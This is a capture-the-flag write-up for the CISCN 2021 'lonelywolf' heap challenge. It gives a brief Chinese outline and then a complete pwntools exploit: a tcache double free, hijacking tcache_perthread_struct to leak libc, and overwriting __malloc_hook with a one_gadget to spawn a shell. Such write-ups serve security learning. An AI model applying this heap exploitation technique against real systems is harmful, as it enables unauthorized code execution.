Problem: [CISCN 2021 初赛]lonelywolf
思路：先 double free 拿到 chunk 地址，要点是 libc 2.27 后期版本有 key，需要先清空 fd。泄露后可以拿到 tcache_perthread_struct，然后改 idx 为 7 让它认为满了，释放 tcache_perthread_struct，然后拿到 main_arena，得到 Libc_base。然后修复一下结构，比如 0x80 的 idx，以及把 0x80 对应 chunk 的地址改成 malloc_hook - 0x17（这个的 size 位是 7d，可以用）。然后就写脏数据到 __malloc_hook，写一个 One_gadget，然后直接调用 malloc 完成 getshell。
EXP

from pwn import *
# pwntools 'debug' level logs the raw bytes exchanged with the remote; handy when
# the leak parsing further down does not line up with the menu prompts.
context.log_level = 'debug'
# Challenge instance (host/port as given in the write-up).
p = remote("node4.anna.nssctf.cn",28937)
# Local challenge binary; `e` is not referenced anywhere in the visible script.
e = ELF('./lonelywolf')
# Local copy of the challenge's libc (2.27-3ubuntu1.6); every symbol offset below comes from it.
libc = ELF('/home/rick/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so')
def new(idx, size):
    """Menu option 1: ask the remote to allocate a chunk of `size` bytes.

    `idx` is accepted for symmetry with the other helpers but is NOT sent:
    the index written to the remote is always 0 (the script only uses slot 0).
    Uses the module-level `p` connection.
    """
    prompts = (
        (b'Your choice: ', 1),
        (b'Index:', 0),
        (b'Size:', size),
    )
    for prompt, value in prompts:
        p.sendlineafter(prompt, str(value))
def edit(idx, content):
    """Menu option 2: write `content` (bytes) into the chunk at slot `idx`.

    Uses the module-level `p` connection; `content` is sent as-is.
    """
    menu_choice = 2
    p.sendlineafter(b'Your choice: ', str(menu_choice))
    p.sendlineafter(b'Index:', str(idx))
    p.sendlineafter(b'Content: ', content)
def show(idx):
    """Menu option 3: ask the remote to print the chunk at slot `idx`.

    The caller reads the output itself (see the `p.recvuntil(b"Content: ")`
    calls in the main script). Uses the module-level `p` connection.
    """
    menu_choice = 3
    for prompt, value in ((b'Your choice: ', menu_choice), (b'Index:', idx)):
        p.sendlineafter(prompt, str(value))
def free(idx):
    """Menu option 4: ask the remote to free the chunk at slot `idx`.

    Uses the module-level `p` connection.
    """
    menu_choice = 4
    for prompt, value in ((b'Your choice: ', menu_choice), (b'Index:', idx)):
        p.sendlineafter(prompt, str(value))
# Stage 1 (as described in the write-up): double free on slot 0 to leak a heap pointer.
new(0,0x78)
free(0)
# Overwrite the first 16 bytes of the freed chunk; the write-up notes that on this
# 2.27 build the tcache "key" has to be cleared before the second free is accepted.
edit(0,b'a'*16)
free(0)
show(0)
p.recvuntil(b"Content: ")
# The first 6 bytes of the chunk now hold a pointer back into the heap; zero-extend to 8 bytes.
heap_address = u64(p.recv(6).ljust(8,b'\x00'))
log.success("leak head_address=>"+hex(heap_address))
# Page-align the leak; the write-up treats this as the address of tcache_perthread_struct.
tcache_struct_addr = heap_address & 0xFFFFFFFFF000
log.success("leak tcache_struct_addr=>"+hex(tcache_struct_addr))
# Stage 2: point the freed chunk's forward pointer at tcache_perthread_struct+0x10 so the
# second allocation below returns a pointer into that structure.
edit(0,p64(tcache_struct_addr+0x10))
new(0,0x78)
new(0,0x78)
# Write into the tcache bookkeeping: the write-up sets one bin's count to 7 ("full") so that
# freeing the structure's own chunk bypasses tcache and leaves a main_arena pointer in it.
edit(0,p64(0)*4+p64(0x7000000))
free(0)
show(0)
p.recvuntil(b"Content: ")
# Leak is main_arena+96; the code treats main_arena as sitting 0x10 past __malloc_hook in
# this libc, which is what the two subtractions plus the symbol offset undo.
libc_base = u64(p.recv(6).ljust(8,b'\x00')) - 96 - 0x10 - libc.sym["__malloc_hook"]
malloc = libc_base + libc.sym["__malloc_hook"]
log.success("leak libc_base=>"+hex(libc_base))
log.success("leak malloc=>"+hex(malloc))
# Stage 3: repair the structure (the write-up: set the 0x80 bin's count back to 1) and make
# that bin's entry __malloc_hook - 0x17, which the write-up says carries a usable size field (0x7d).
edit(0,p64(0x1000000000000)+p64(0)*13+p64(libc_base + libc.sym["__malloc_hook"] - 0x17))
# This allocation returns the pointer planted above.
new(0,0x78)
# one_gadget offsets for this libc build, as listed in the write-up; only og[0] is used.
og=[0x10a41c,0x4f302,0xe54f7,0xe54fe,0xe5502,0x10a2fc,0x10a308]
# 0x17 bytes of filler place the gadget address exactly on __malloc_hook.
edit(0,b'a'*0x17+p64(libc_base+og[0]))
# The next malloc call goes through the overwritten hook.
new(0,0x78)
p.interactive()
总结
|